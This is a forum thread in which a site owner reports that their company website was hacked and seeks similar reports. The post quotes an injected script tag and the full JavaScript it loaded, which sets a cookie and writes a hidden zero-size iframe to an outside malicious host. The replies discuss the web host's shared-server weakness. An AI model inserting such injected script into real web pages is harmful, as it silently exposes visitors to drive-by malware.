Website management fun! or not...

CJones

Final Approach
Display Name

Display name:
uHaveNoIdea
I went to check on one of my company's sites, and it was taking longer than normal to respond. I paid attention to the status messages at the bottom of the browser and noticed that it was reading something from news.212cafe.com. Weird. Look at the page source once the page loads, and the following line is at the very top of the page (even before the <html> tag):
Code:
<script src=http://news.212cafe.com/images/j.js></script>
Uh oh. Not good. I pulled up the .js file and it contains the following:
Code:
[FONT=Verdana]function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
window.status=' ';
document.write("<iframe src=\"http://m.winxyz.com\" width=0 height=0></ifame>");
} 
}Get();
[/FONT]

The 'm.winxyz.com' site won't come up as it appear malicious, but I can only assume that they are NOT trying to post pictures of cute puppies on my site.

I've submitted a ticket to our web host (networksolutions) and the site is down right now, hopefully so they can investigate any security breaches.

Anyone else seeing this hack recently, or am I just a lucky one?

Yep. It also appears that our web host has had issues with these types of attacks in the past. Something about how they have their shared servers set up allows hackers who hack into one site to gain access to all sites on the server.

About 10 minutes after I submitted a support ticket to them, our site and our database server were down. The site has been at various stages of up-and-down ever since then.

Luckily, we don't store any 'sensitive' data on our site - all information we store is public access to begin with. I'll still be changing our admin passwords as soon as the site is back up.

We were wanting to change hosts already, but this little fiasco might have bumped our time-frame up a bit.

Back